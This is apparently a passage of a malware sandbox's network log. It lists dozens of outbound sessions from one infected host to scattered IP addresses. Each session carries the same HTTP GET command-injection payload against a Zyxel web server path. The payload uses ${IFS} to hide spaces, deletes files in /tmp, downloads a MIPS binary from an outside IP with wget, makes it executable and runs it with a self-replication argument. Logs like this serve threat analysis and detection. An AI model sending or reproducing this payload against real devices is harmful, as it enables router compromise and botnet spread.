                                                Jan 12, 2024 18:16:35.746081114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7586192.168.2.2336312106.166.195.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746114969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7587192.168.2.234067436.28.165.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746184111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7588192.168.2.2355640195.239.169.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746252060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7589192.168.2.2336514163.47.77.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746318102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7590192.168.2.2347948147.6.216.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746372938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7591192.168.2.2340946146.169.111.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746422052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7592192.168.2.23534301.206.175.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746450901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7593192.168.2.2346950144.138.166.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746510983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7594192.168.2.2358344139.98.5.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746572971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7595192.168.2.2360340102.162.43.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746607065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7596192.168.2.2341720147.219.72.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746654034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7597192.168.2.2354312108.171.149.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746751070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7598192.168.2.236004070.77.112.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746784925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7599192.168.2.2350994119.63.25.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746828079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7600192.168.2.2337238124.115.197.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746891975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7601192.168.2.2347236107.159.181.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746925116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7602192.168.2.2358956172.174.198.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.746974945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7603192.168.2.2349646189.15.48.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747003078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7604192.168.2.23395449.104.232.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747085094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7605192.168.2.235720450.186.6.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747134924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7606192.168.2.2346822208.115.136.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747193098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7607192.168.2.234632495.194.94.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747235060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7608192.168.2.2358902167.38.191.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747270107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7609192.168.2.2336788163.118.89.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747318029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7610192.168.2.235651496.229.25.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747396946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7611192.168.2.235164851.30.243.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747490883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7612192.168.2.235451898.112.136.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747538090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7613192.168.2.2341386181.137.168.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747560978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7614192.168.2.2357520130.235.213.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747594118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7615192.168.2.2342682134.60.48.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747618914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7616192.168.2.2350356158.75.156.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747684956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7617192.168.2.2347032128.92.103.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747739077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7618192.168.2.2333872188.136.41.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747806072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7619192.168.2.2343618172.1.107.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747873068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7620192.168.2.2334480175.3.158.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747947931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7621192.168.2.235680051.0.197.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.747997046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7622192.168.2.2353362218.188.33.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748030901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7623192.168.2.235749898.38.103.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748073101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7624192.168.2.234612065.220.195.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748119116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7625192.168.2.235483413.75.18.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748183966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7626192.168.2.2357102146.173.116.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748250008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7627192.168.2.233557095.42.221.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748310089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7628192.168.2.2345004110.93.138.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748338938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7629192.168.2.235083473.30.153.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748403072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7630192.168.2.2355234168.84.71.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748444080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7631192.168.2.2344678161.243.28.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748502016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7632192.168.2.235325882.217.107.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748524904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7633192.168.2.235077496.58.198.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748570919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7634192.168.2.233802449.90.17.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748617887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7635192.168.2.235281060.187.251.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748631954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7636192.168.2.2356270142.16.10.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748683929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7637192.168.2.2346368156.230.97.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748708963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7638192.168.2.2355050123.63.192.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748797894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7639192.168.2.2344448164.16.225.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748821020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7640192.168.2.2338748197.236.140.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748859882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7641192.168.2.2350912163.100.211.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748924017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7642192.168.2.233640632.190.24.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.748975992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7643192.168.2.2346032141.99.212.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749011040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7644192.168.2.235721470.162.72.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749027967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7645192.168.2.233358265.96.174.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749085903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7646192.168.2.234863042.125.86.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749136925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7647192.168.2.234696434.233.206.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.749207973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7648192.168.2.2341190181.58.214.243443
                                                TimestampBytes transferredDirectionData
